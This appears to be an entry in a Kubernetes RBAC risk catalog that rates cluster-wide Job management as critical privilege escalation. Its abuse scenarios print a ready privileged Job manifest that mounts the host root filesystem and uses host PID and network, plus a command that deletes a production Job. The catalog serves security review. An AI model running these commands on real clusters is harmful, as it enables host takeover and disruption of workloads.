Manage Jobs cluster-wide (one-off privileged execution)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1041 |
| Name | Manage Jobs cluster-wide (one-off privileged execution) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | batch |
| Resources | jobs |
| Verbs | create, update, patch, delete |
| Tags | PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Allows creating, updating, or deleting Jobs across all namespaces. Jobs create one or more pods for batch tasks. This can be used to run a one-off pod with privileged settings, leading to code execution, privilege escalation, and tampering.
Abuse Scenarios
- Create a new Job that runs a privileged pod once.
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: Job
metadata:
name: privileged-job
spec:
template:
spec:
hostNetwork: true
hostPID: true
containers:
- name: attacker
image: busybox
command: ["/bin/sh", "-c", "echo 'Job Pwned!' > /host/job_pwned.txt"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: host-root
volumes:
- name: host-root
hostPath:
path: /
restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Delete a critical Job, preventing a one-off task from completing.
kubectl delete job <job-name> -n <namespace>
# Example: kubectl delete job db-migration-job -n production